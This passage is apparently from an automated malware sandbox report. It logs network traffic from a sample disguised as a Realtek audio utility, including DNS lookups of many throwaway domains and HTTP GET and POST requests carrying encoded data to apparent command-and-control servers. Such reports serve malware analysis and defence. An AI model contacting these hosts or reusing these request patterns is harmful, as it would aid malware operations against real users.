                                                                            Dec 3, 2024 19:00:05.463969946 CET4982980192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 19:00:06.480128050 CET4983080192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 19:00:06.828974962 CET8049830149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 19:00:06.829174042 CET4983080192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 19:00:06.831593990 CET4983080192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 19:00:07.185399055 CET8049830149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 19:00:07.185410023 CET8049830149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 19:00:07.185736895 CET4983080192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 19:00:07.186445951 CET4983080192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 19:00:07.187783003 CET8049830149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 19:00:07.187933922 CET4983080192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 19:00:07.534965992 CET8049830149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 19:00:12.197638988 CET4983180192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:12.539840937 CET8049831101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:12.540003061 CET4983180192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:12.543556929 CET4983180192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:12.885833025 CET8049831101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:12.886154890 CET8049831101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:12.886192083 CET8049831101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:12.886351109 CET4983180192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:14.055816889 CET4983180192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:15.072092056 CET4983280192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:15.404391050 CET8049832101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:15.404654980 CET4983280192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:15.408231974 CET4983280192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:15.740432978 CET8049832101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:15.740709066 CET8049832101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:15.740756035 CET8049832101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:15.740889072 CET4983280192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:16.914566040 CET4983280192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:17.930841923 CET4983380192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:18.268235922 CET8049833101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:18.268485069 CET4983380192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:18.272083998 CET4983380192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:18.272135973 CET4983380192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:18.272186995 CET4983380192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:18.602873087 CET8049833101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:18.603094101 CET8049833101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:18.603137016 CET8049833101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:18.603166103 CET8049833101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:18.603387117 CET8049833101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:18.603432894 CET8049833101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:18.603529930 CET4983380192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:19.773339987 CET4983380192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:20.789623976 CET4983480192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:21.131441116 CET8049834101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:21.131690025 CET4983480192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:21.134114027 CET4983480192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:21.475994110 CET8049834101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:21.476221085 CET8049834101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:21.476269007 CET8049834101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:21.476588964 CET4983480192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:21.477232933 CET4983480192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:21.818963051 CET8049834101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:26.491342068 CET4983580192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:26.851093054 CET804983538.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:26.851319075 CET4983580192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:26.854875088 CET4983580192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:27.214847088 CET804983538.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:27.215039968 CET804983538.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:27.215291977 CET4983580192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:28.365135908 CET4983580192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:29.381371975 CET4983680192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:29.742224932 CET804983638.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:29.742410898 CET4983680192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:29.745966911 CET4983680192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:30.111387014 CET804983638.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:30.111435890 CET804983638.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:30.112224102 CET4983680192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:31.255181074 CET4983680192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:32.271434069 CET4983780192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:32.612479925 CET804983738.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:32.612716913 CET4983780192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:32.616333961 CET4983780192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:32.616430044 CET4983780192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:32.957693100 CET804983738.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:32.957735062 CET804983738.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:32.958045959 CET804983738.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:32.958338976 CET804983738.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:32.958389997 CET804983738.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:32.958544016 CET4983780192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:34.129570961 CET4983780192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:35.145662069 CET4983880192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:35.484428883 CET804983838.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:35.484616995 CET4983880192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:35.487014055 CET4983880192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:35.825947046 CET804983838.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:35.826168060 CET804983838.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:35.826457024 CET4983880192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:35.827109098 CET4983880192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:36.165729046 CET804983838.47.232.202192.168.11.20

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 3, 2024 18:54:19.162298918 CET6052253192.168.11.201.1.1.1
                                                                            Dec 3, 2024 18:54:19.809456110 CET53605221.1.1.1192.168.11.20
                                                                            Dec 3, 2024 18:54:53.742624998 CET5931953192.168.11.201.1.1.1
                                                                            Dec 3, 2024 18:54:54.750744104 CET5931953192.168.11.209.9.9.9
                                                                            Dec 3, 2024 18:54:54.927021027 CET53593191.1.1.1192.168.11.20
                                                                            Dec 3, 2024 18:54:55.442519903 CET53593199.9.9.9192.168.11.20
                                                                            Dec 3, 2024 18:55:10.716958046 CET5426053192.168.11.201.1.1.1
                                                                            Dec 3, 2024 18:55:10.876348972 CET53542601.1.1.1192.168.11.20
                                                                            Dec 3, 2024 18:55:24.261451006 CET6295353192.168.11.201.1.1.1
                                                                            Dec 3, 2024 18:55:24.466303110 CET53629531.1.1.1192.168.11.20
                                                                            Dec 3, 2024 18:55:38.023405075 CET5772453192.168.11.201.1.1.1
                                                                            Dec 3, 2024 18:55:39.037900925 CET5772453192.168.11.209.9.9.9
                                                                            Dec 3, 2024 18:55:39.088303089 CET53577241.1.1.1192.168.11.20
                                                                            Dec 3, 2024 18:55:39.656922102 CET53577249.9.9.9192.168.11.20
                                                                            Dec 3, 2024 18:55:52.816776037 CET5058553192.168.11.201.1.1.1
                                                                            Dec 3, 2024 18:55:53.199314117 CET53505851.1.1.1192.168.11.20
                                                                            Dec 3, 2024 18:56:07.016823053 CET5169953192.168.11.201.1.1.1
                                                                            Dec 3, 2024 18:56:07.449984074 CET53516991.1.1.1192.168.11.20
                                                                            Dec 3, 2024 18:56:21.013869047 CET5347353192.168.11.201.1.1.1
                                                                            Dec 3, 2024 18:56:21.956434011 CET53534731.1.1.1192.168.11.20
                                                                            Dec 3, 2024 18:56:36.260354042 CET6262553192.168.11.201.1.1.1
                                                                            Dec 3, 2024 18:56:36.938003063 CET53626251.1.1.1192.168.11.20
                                                                            Dec 3, 2024 18:56:51.257054090 CET5590753192.168.11.201.1.1.1
                                                                            Dec 3, 2024 18:56:51.729834080 CET53559071.1.1.1192.168.11.20
                                                                            Dec 3, 2024 18:57:06.097645998 CET5837453192.168.11.201.1.1.1
                                                                            Dec 3, 2024 18:57:06.419995070 CET53583741.1.1.1192.168.11.20
                                                                            Dec 3, 2024 18:57:21.609813929 CET5931153192.168.11.201.1.1.1
                                                                            Dec 3, 2024 18:57:21.858463049 CET53593111.1.1.1192.168.11.20
                                                                            Dec 3, 2024 18:57:36.231853962 CET6210053192.168.11.201.1.1.1
                                                                            Dec 3, 2024 18:57:36.366743088 CET53621001.1.1.1192.168.11.20
                                                                            Dec 3, 2024 18:57:50.462764978 CET5166653192.168.11.201.1.1.1
                                                                            Dec 3, 2024 18:57:50.626981020 CET53516661.1.1.1192.168.11.20
                                                                            Dec 3, 2024 18:58:04.225505114 CET5616953192.168.11.201.1.1.1
                                                                            Dec 3, 2024 18:58:04.592681885 CET53561691.1.1.1192.168.11.20
                                                                            Dec 3, 2024 18:58:18.129406929 CET5128553192.168.11.201.1.1.1
                                                                            Dec 3, 2024 18:58:18.607707977 CET53512851.1.1.1192.168.11.20
                                                                            Dec 3, 2024 18:58:32.656719923 CET5531553192.168.11.201.1.1.1
                                                                            Dec 3, 2024 18:58:32.953829050 CET53553151.1.1.1192.168.11.20

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Dec 3, 2024 18:54:19.162298918 CET192.168.11.201.1.1.10x4cbStandard query (0)babalharra.com.auA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:54:53.742624998 CET192.168.11.201.1.1.10xf652Standard query (0)www.thaor56.onlineA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:54:54.750744104 CET192.168.11.209.9.9.90xf652Standard query (0)www.thaor56.onlineA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:10.716958046 CET192.168.11.201.1.1.10x73d7Standard query (0)www.optimismbank.xyzA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:24.261451006 CET192.168.11.201.1.1.10x7f3aStandard query (0)www.greenthub.lifeA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:38.023405075 CET192.168.11.201.1.1.10x891bStandard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:39.037900925 CET192.168.11.209.9.9.90x891bStandard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:52.816776037 CET192.168.11.201.1.1.10xe582Standard query (0)www.bankseedz.infoA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:56:07.016823053 CET192.168.11.201.1.1.10xef60Standard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:56:21.013869047 CET192.168.11.201.1.1.10xaabfStandard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:56:36.260354042 CET192.168.11.201.1.1.10xafd8Standard query (0)www.yc791022.asiaA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:56:51.257054090 CET192.168.11.201.1.1.10x2db8Standard query (0)www.43kdd.topA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:57:06.097645998 CET192.168.11.201.1.1.10xf7fStandard query (0)www.jcsa.infoA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:57:21.609813929 CET192.168.11.201.1.1.10x419cStandard query (0)www.1secondlending.oneA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:57:36.231853962 CET192.168.11.201.1.1.10x750fStandard query (0)www.zkdamdjj.shopA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:57:50.462764978 CET192.168.11.201.1.1.10x3f8bStandard query (0)www.rgenerousrs.storeA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:58:04.225505114 CET192.168.11.201.1.1.10x862cStandard query (0)www.bpgroup.siteA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:58:18.129406929 CET192.168.11.201.1.1.10xc611Standard query (0)www.aballanet.catA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:58:32.656719923 CET192.168.11.201.1.1.10x92a0Standard query (0)www.remedies.proA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Dec 3, 2024 18:54:19.809456110 CET1.1.1.1192.168.11.200x4cbNo error (0)babalharra.com.au122.201.127.17A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:54:54.927021027 CET1.1.1.1192.168.11.200xf652No error (0)www.thaor56.onlinethaor56.onlineCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 3, 2024 18:54:54.927021027 CET1.1.1.1192.168.11.200xf652No error (0)thaor56.online202.92.5.23A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:54:55.442519903 CET9.9.9.9192.168.11.200xf652No error (0)www.thaor56.onlinethaor56.onlineCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 3, 2024 18:54:55.442519903 CET9.9.9.9192.168.11.200xf652No error (0)thaor56.online202.92.5.23A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:10.876348972 CET1.1.1.1192.168.11.200x73d7No error (0)www.optimismbank.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:10.876348972 CET1.1.1.1192.168.11.200x73d7No error (0)www.optimismbank.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:24.466303110 CET1.1.1.1192.168.11.200x7f3aNo error (0)www.greenthub.life209.74.77.109A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:39.088303089 CET1.1.1.1192.168.11.200x891bNo error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:39.088303089 CET1.1.1.1192.168.11.200x891bNo error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:39.088303089 CET1.1.1.1192.168.11.200x891bNo error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:39.088303089 CET1.1.1.1192.168.11.200x891bNo error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:39.088303089 CET1.1.1.1192.168.11.200x891bNo error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:39.656922102 CET9.9.9.9192.168.11.200x891bNo error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:39.656922102 CET9.9.9.9192.168.11.200x891bNo error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:39.656922102 CET9.9.9.9192.168.11.200x891bNo error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:39.656922102 CET9.9.9.9192.168.11.200x891bNo error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:39.656922102 CET9.9.9.9192.168.11.200x891bNo error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:55:53.199314117 CET1.1.1.1192.168.11.200xe582No error (0)www.bankseedz.info46.30.211.38A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:56:07.449984074 CET1.1.1.1192.168.11.200xef60No error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:56:21.956434011 CET1.1.1.1192.168.11.200xaabfNo error (0)www.xcvbj.asia149.88.81.190A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:56:36.938003063 CET1.1.1.1192.168.11.200xafd8No error (0)www.yc791022.asia101.35.209.183A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:56:51.729834080 CET1.1.1.1192.168.11.200x2db8No error (0)www.43kdd.top43kdd.topCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 3, 2024 18:56:51.729834080 CET1.1.1.1192.168.11.200x2db8No error (0)43kdd.top38.47.232.202A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:57:06.419995070 CET1.1.1.1192.168.11.200xf7fNo error (0)www.jcsa.info208.91.197.39A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:57:21.858463049 CET1.1.1.1192.168.11.200x419cNo error (0)www.1secondlending.one43.205.198.29A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:57:36.366743088 CET1.1.1.1192.168.11.200x750fNo error (0)www.zkdamdjj.shop172.67.187.114A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:57:36.366743088 CET1.1.1.1192.168.11.200x750fNo error (0)www.zkdamdjj.shop104.21.40.167A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:57:50.626981020 CET1.1.1.1192.168.11.200x3f8bNo error (0)www.rgenerousrs.store104.21.57.248A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:57:50.626981020 CET1.1.1.1192.168.11.200x3f8bNo error (0)www.rgenerousrs.store172.67.167.146A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:58:04.592681885 CET1.1.1.1192.168.11.200x862cNo error (0)www.bpgroup.sitebpgroup.siteCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 3, 2024 18:58:04.592681885 CET1.1.1.1192.168.11.200x862cNo error (0)bpgroup.site74.48.143.82A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:58:18.607707977 CET1.1.1.1192.168.11.200xc611No error (0)www.aballanet.cataballanet.catCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 3, 2024 18:58:18.607707977 CET1.1.1.1192.168.11.200xc611No error (0)aballanet.cat134.0.14.158A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 18:58:32.953829050 CET1.1.1.1192.168.11.200x92a0Name error (3)www.remedies.prononenoneA (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • babalharra.com.au
                                                                            • www.thaor56.online
                                                                            • www.optimismbank.xyz
                                                                            • www.greenthub.life
                                                                            • www.bankseedz.info
                                                                            • www.madhf.tech
                                                                            • www.xcvbj.asia
                                                                            • www.yc791022.asia
                                                                            • www.43kdd.top
                                                                            • www.jcsa.info
                                                                            • www.1secondlending.one
                                                                            • www.zkdamdjj.shop
                                                                            • www.rgenerousrs.store
                                                                            • www.bpgroup.site

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.11.2049749202.92.5.23807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:54:55.301713943 CET488OUTGET /fev0/?ChhG6=J-xs&2O=ZsYTLU62Pg4Ji1Y4s61CDYlnLyOe/AQTsxMfn/Xy/YyeGOVtNzq5pk+0tbrPVR8P9zBOlb50dZZ9z8YaOITKi+mT6s78g50JMD8l1vaIe5uutk/kbfnPw4g= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.thaor56.online
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:54:55.669975996 CET1289INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Tue, 03 Dec 2024 17:54:55 GMT
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                            Dec 3, 2024 18:54:55.670022964 CET181INData Raw: 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73
                                                                            Data Ascii: d Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.11.204975013.248.169.48807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:55:11.037081003 CET767OUTPOST /98j3/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.optimismbank.xyz
                                                                            Origin: http://www.optimismbank.xyz
                                                                            Referer: http://www.optimismbank.xyz/98j3/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 5a 74 78 75 65 35 57 6d 69 48 55 59 31 75 53 2b 47 31 6f 4a 62 6f 35 2f 54 32 4f 5a 46 2f 7a 48 58 6c 63 4b 41 64 45 52 49 6a 50 4a 75 62 46 61 65 4e 6e 64 30 59 79 64 34 57 79 76 48 62 4f 42 62 59 64 79 64 66 4c 45 50 49 62 6b 54 4b 4e 52 4f 54 6f 76 75 59 68 75 4a 41 49 75 31 5a 30 59 48 37 67 42 58 63 43 42 42 4f 61 49 34 67 6b 32 47 62 34 76 48 33 6c 36 51 46 4d 67 41 62 66 43 58 55 6e 45 5a 31 35 51 74 39 6b 51 6e 2b 48 70 6f 42 77 4d 6f 31 4d 6c 4a 65 71 75 76 56 76 4c 55 58 58 66 78 47 66 4b 67 72 6f 45 4b 79 4e 77 78 64 65 4a 4f 41 3d 3d
                                                                            Data Ascii: 2O=uqdCK+O/4KmQZtxue5WmiHUY1uS+G1oJbo5/T2OZF/zHXlcKAdERIjPJubFaeNnd0Yyd4WyvHbOBbYdydfLEPIbkTKNROTovuYhuJAIu1Z0YH7gBXcCBBOaI4gk2Gb4vH3l6QFMgAbfCXUnEZ15Qt9kQn+HpoBwMo1MlJequvVvLUXXfxGfKgroEKyNwxdeJOA==


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.11.204975113.248.169.48807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:55:13.717525959 CET787OUTPOST /98j3/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.optimismbank.xyz
                                                                            Origin: http://www.optimismbank.xyz
                                                                            Referer: http://www.optimismbank.xyz/98j3/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 59 4e 42 75 5a 72 2b 6d 7a 6e 55 62 70 2b 53 2b 4a 56 6f 4e 62 6f 39 2f 54 7a 72 43 46 4a 6a 48 58 45 73 4b 48 5a 51 52 4c 6a 50 4a 6d 37 46 62 42 64 6e 53 30 59 50 69 34 58 2b 76 48 62 61 42 62 61 46 79 42 34 2f 48 50 59 62 6d 4b 61 4e 45 4b 54 6f 76 75 59 68 75 4a 41 64 31 31 64 51 59 48 4c 51 42 56 34 57 43 49 75 61 4c 78 41 6b 32 4d 4c 34 72 48 33 6c 59 51 42 4e 39 41 5a 6e 43 58 55 58 45 5a 41 5a 54 34 4e 6b 73 36 4f 47 56 6f 78 64 6f 6b 57 59 57 41 4e 61 43 6e 32 66 6b 59 68 61 46 73 30 72 75 6a 34 30 32 4f 43 30 59 7a 66 66 53 54 47 49 55 56 42 73 57 4c 33 61 71 63 6b 52 4c 51 4c 59 54 4f 66 30 3d
